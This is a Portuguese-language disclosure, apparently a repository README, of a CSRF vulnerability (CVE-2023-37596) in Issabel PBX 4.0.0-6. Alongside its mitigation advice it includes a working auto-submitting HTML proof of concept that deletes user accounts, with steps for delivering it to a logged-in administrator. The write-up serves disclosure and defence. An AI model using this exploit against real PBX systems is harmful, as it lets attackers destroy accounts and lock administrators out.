
CVE-2023-37596 é uma vulnerabilidade de Cross-Site Request Forgery (CSRF) descoberta no Issabel PBX versão 4.0.0-6, uma plataforma de comunicações unificadas de código aberto amplamente utilizada.
Gravidade: Alta | CVSS v3.1: 8.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H) | CWE: CWE-352
Uma vulnerabilidade de Cross-Site Request Forgery (CSRF) foi descoberta no Issabel PBX versão 4.0.0-6. O endpoint de gerenciamento de usuários não implementa nenhuma proteção contra CSRF, o que permite que um atacante remoto não autenticado crie uma página da web maliciosa que — quando visitada por um administrador autenticado do Issabel — exclui silenciosamente qualquer conta de usuário do sistema. A exploração repetida pode tornar toda a aplicação inacessível ao remover todos os usuários administrativos.
| Campo | Valor |
|---|---|
| ID do CVE | CVE-2023-37596 |
| Tipo de Vulnerabilidade | Cross-Site Request Forgery (CSRF) |
| CWE | CWE-352 |
| Produto | Issabel PBX |
| Versão Vulnerável | 4.0.0-6 |
| Página do Fornecedor | https://www.issabel.org/ |
| Repositório do Software | https://github.com/IssabelFoundation/issabelPBX |
| Testado Em | Windows |
| CVE Publicado | 10/07/2023 |
| Descoberto Por | Sahil Ojha |
Como o Issabel PBX não valida a origem de requisições que alteram o estado na sua interface de gerenciamento de usuários, um ataque CSRF bem-sucedido permite que um atacante:
| Produto | Versão Afetada | Status |
|---|---|---|
| issabel-pbx | 4.0.0-6 | Vulnerável |
Um atacante hospeda uma página HTML maliciosa contendo uma requisição HTTP forjada direcionada ao endpoint de exclusão de usuário da aplicação Issabel PBX. O ataque é acionado automaticamente (ou por um clique em um botão) quando um usuário já autenticado no Issabel visita a página maliciosa no mesmo navegador. Como o navegador inclui automaticamente os cookies de sessão da vítima em cada requisição, o servidor aceita a requisição de exclusão forjada como legítima.
Nenhum privilégio especial é necessário do lado do atacante — apenas um vetor de engenharia social (link de phishing, anúncio malicioso, etc.) para atrair o administrador autenticado até a página criada.
Principais características deste ataque:
id=1, id=2, …) pode ser alvo ao modificar o payload.Navegue até a página de lista de usuários do Issabel PBX e autentique-se com credenciais de administrador:
https://<Issabel-IP>/index.php?menu=userlist


O Burp Suite produzirá uma página HTML semelhante à abaixo. Salve-a como um arquivo .html (por exemplo, csrf_exploit.html):
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://<Issabel-IP>/index.php?menu=userlist" method="POST">
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="id" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
// Auto-submit the form as soon as the page loads
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Nota: Substitua
<Issabel-IP>pelo endereço IP ou nome do host do servidor de destino e ajuste o valor deidpara ter como alvo uma conta de usuário diferente.
Envie o arquivo csrf_exploit.html (ou um link para onde ele está hospedado) para um usuário que esteja atualmente conectado ao Issabel PBX. Quando a vítima abrir a página, o formulário é enviado automaticamente e o usuário de destino é excluído sem nenhum prompt de confirmação.


As seguintes defesas devem ser aplicadas pelo fornecedor e/ou pelos administradores do sistema para remediar esta vulnerabilidade:
Implementar Tokens CSRF — Gere um token criptograficamente aleatório, por sessão (ou por requisição) e valide-o no lado do servidor para toda requisição que altere o estado. Requisições que não contenham um token válido devem ser rejeitadas.
Atributo de Cookie SameSite — Defina o atributo SameSite do cookie de sessão como Strict ou Lax para impedir que requisições de origens cruzadas carreguem o cookie de sessão na maioria dos navegadores.
Verificar o Cabeçalho Origin / Referer — No lado do servidor, rejeite qualquer requisição que altere o estado cujo cabeçalho Origin ou Referer não corresponda ao próprio domínio da aplicação.
Exigir Reautenticação para Ações Destrutivas — Solicite ao usuário que digite novamente sua senha antes de processar ações irreversíveis, como excluir contas de usuário.
Aplicar o Princípio do Menor Privilégio — Garanta que apenas usuários com um papel explícito de administrador possam acessar a funcionalidade de exclusão de usuários, reduzindo o raio de impacto de um ataque bem-sucedido.
Até que um patch do fornecedor esteja disponível, os administradores são aconselhados a:
| Data | Evento |
|---|---|
| 10/07/2023 | Vulnerabilidade descoberta e relatada |
| 10/07/2023 | CVE-2023-37596 atribuído |
Sahil Ojha
Aviso Legal: Este repositório é publicado apenas para fins educacionais e de divulgação responsável. As informações aqui fornecidas não devem ser usadas para atacar sistemas sem permissão explícita por escrito do proprietário do sistema. O autor não se responsabiliza por qualquer uso indevido destas informações.